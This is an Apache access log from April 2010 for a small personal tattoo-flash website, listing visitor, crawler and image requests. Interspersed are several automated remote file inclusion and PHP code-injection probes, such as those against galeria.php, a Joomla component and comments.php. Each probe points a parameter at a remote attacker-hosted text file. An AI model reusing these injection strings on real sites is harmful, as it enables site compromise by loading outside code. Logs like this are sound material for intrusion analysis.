67.222.152.66 - - [18/Apr/2010:20:25:26 -0500] "GET /logs//galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.222.152.66 - - [18/Apr/2010:20:25:26 -0500] "GET //galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
67.222.152.66 - - [18/Apr/2010:20:25:26 -0500] "GET /logs/access_log.1267920000//galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [18/Apr/2010:20:25:58 -0500] "GET /logs/access_log.1267920000%20%20//galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.222.152.66 - - [18/Apr/2010:20:26:01 -0500] "GET /logs/access_log.1267920000%20%20//galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.222.152.66 - - [18/Apr/2010:20:26:02 -0500] "GET /logs/access_log.1267920000%20%20//galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [18/Apr/2010:20:30:59 -0500] "GET /logs/access_log.1249171200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [18/Apr/2010:20:31:55 -0500] "GET /logs/access_log.1264896000//galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.28.3.241 - - [18/Apr/2010:20:32:00 -0500] "GET /logs/access_log.1225929600 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1225929600""Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
89.28.3.241 - - [18/Apr/2010:20:32:01 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
207.46.13.96 - - [18/Apr/2010:20:33:01 -0500] "GET /logs/access_log.1238284800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.222.152.66 - - [18/Apr/2010:20:33:18 -0500] "GET /logs/access_log.1264896000//galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [18/Apr/2010:20:33:21 -0500] "GET /logs/access_log.1264896000//galeria.php?start=0&kategoria=http://buyrbid.com//images/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.34.94.214 - - [18/Apr/2010:20:33:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
65.34.94.214 - - [18/Apr/2010:20:33:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
65.34.94.214 - - [18/Apr/2010:20:34:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
110.45.143.142 - - [18/Apr/2010:20:41:17 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
110.45.143.142 - - [18/Apr/2010:20:41:17 -0500] "GET /logs/access_log.1225238400/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 377 "-""Mozilla/5.0"
110.45.143.142 - - [18/Apr/2010:20:41:17 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.250.255.243 - - [18/Apr/2010:20:41:32 -0500] "GET /logs/access_log.1234396800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.97 - - [18/Apr/2010:20:42:00 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.239 - - [18/Apr/2010:20:42:59 -0500] "GET /logs/access_log.1262217600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.51 - - [18/Apr/2010:20:43:00 -0500] "GET /logs/access_log.1198454400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.208.34.38 - - [18/Apr/2010:20:43:08 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
81.208.34.38 - - [18/Apr/2010:20:43:08 -0500] "GET /logs//uigaproxy/include/template.php?content=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.208.34.38 - - [18/Apr/2010:20:43:08 -0500] "GET //uigaproxy/include/template.php?content=http://selectcool.com/wp-admin/css/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
87.250.255.243 - - [18/Apr/2010:20:54:43 -0500] "GET /logs/access_log.1246492800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [18/Apr/2010:20:59:55 -0500] "GET /logs/access_log.1263168000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.46.157.102 - - [18/Apr/2010:21:01:44 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pmsaluminium.com/levha/anket/.safe? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
72.46.157.102 - - [18/Apr/2010:21:01:44 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pmsaluminium.com/levha/anket/.safe? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
72.46.157.102 - - [18/Apr/2010:21:01:52 -0500] "GET /logs/access_log.1268870400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.pmsaluminium.com/levha/anket/.safe? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
87.250.255.243 - - [18/Apr/2010:21:06:33 -0500] "GET /logs/access_log.1176768000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
119.63.198.33 - - [18/Apr/2010:21:07:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.250.255.243 - - [18/Apr/2010:21:16:54 -0500] "GET /logs/access_log.1225843200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
70.160.220.50 - - [18/Apr/2010:21:21:20 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "-""Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.181 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11 Safari/525.20"
200.62.142.217 - - [18/Apr/2010:21:21:32 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ruitershop.com/nieuws_img/thumb/zd1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
200.62.142.217 - - [18/Apr/2010:21:21:32 -0500] "GET /logs/access_log.1262476800//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ruitershop.com/nieuws_img/thumb/zd1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.62.142.217 - - [18/Apr/2010:21:21:32 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ruitershop.com/nieuws_img/thumb/zd1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.62.142.217 - - [18/Apr/2010:21:21:32 -0500] "GET /logs/access_log.1211155200//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://ruitershop.com/nieuws_img/thumb/zd1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
87.250.255.243 - - [18/Apr/2010:21:27:49 -0500] "GET /logs/access_log.1224979200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [18/Apr/2010:21:32:30 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2938 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [18/Apr/2010:21:37:03 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [18/Apr/2010:21:39:19 -0500] "GET /logs/access_log.1252800000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.112.54.90 - - [18/Apr/2010:21:42:22 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://search.aol.com/aol/search?q=1950%27s+tattoo+flash&page=2&nt=SG2&oreq=7a2f762a6b1f48069664f74eb27aa106&s_it=comsearch40""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:22 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:22 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:22 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:22 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:22 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:29 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
207.46.13.84 - - [18/Apr/2010:21:42:48 -0500] "GET /logs/access_log.1202601600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.112.54.90 - - [18/Apr/2010:21:42:48 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:48 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:48 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:48 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:48 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:48 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:48 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:48 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:49 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:49 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:42:49 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:09 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:10 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
70.112.54.90 - - [18/Apr/2010:21:43:31 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Windows-Media-Player/10.00.00.3990; .NET CLR 3.5.30729; .NET CLR 3.0.30618; Zune 4.0)"
